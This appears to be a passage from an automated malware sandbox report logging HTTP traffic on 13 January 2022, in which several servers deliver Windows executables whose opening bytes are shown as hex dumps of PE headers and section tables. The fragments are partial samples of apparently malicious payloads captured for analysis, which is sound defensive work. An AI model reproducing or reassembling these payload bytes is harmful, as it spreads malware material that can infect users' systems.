40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:57 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 
00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Thu, 13 Jan 2022 20:50:05 GMTConnection: keep-aliveETag: "61e0907d-57200"Expires: Thu, 20 Jan 2022 23:15:59 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 f4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 f4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 23:16:08 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 44 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 44 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:09 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 
00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:12 GMTContent-Type: application/octet-streamContent-Length: 354816Last-Modified: Thu, 13 Jan 2022 22:06:44 GMTConnection: keep-aliveETag: "61e0a274-56a00"Expires: Thu, 20 Jan 2022 23:16:12 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 08 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 61 01 00 c8 00 00 00 00 80 01 00 34 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 64 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 a2 cf 00 00 00 50 00 00 00 d0 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 33 00 00 00 20 01 00 00 34 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 17 00 00 00 60 01 00 00 12 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 34 16 04 00 00 80 01 00 00 18 04 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:13 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 
9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 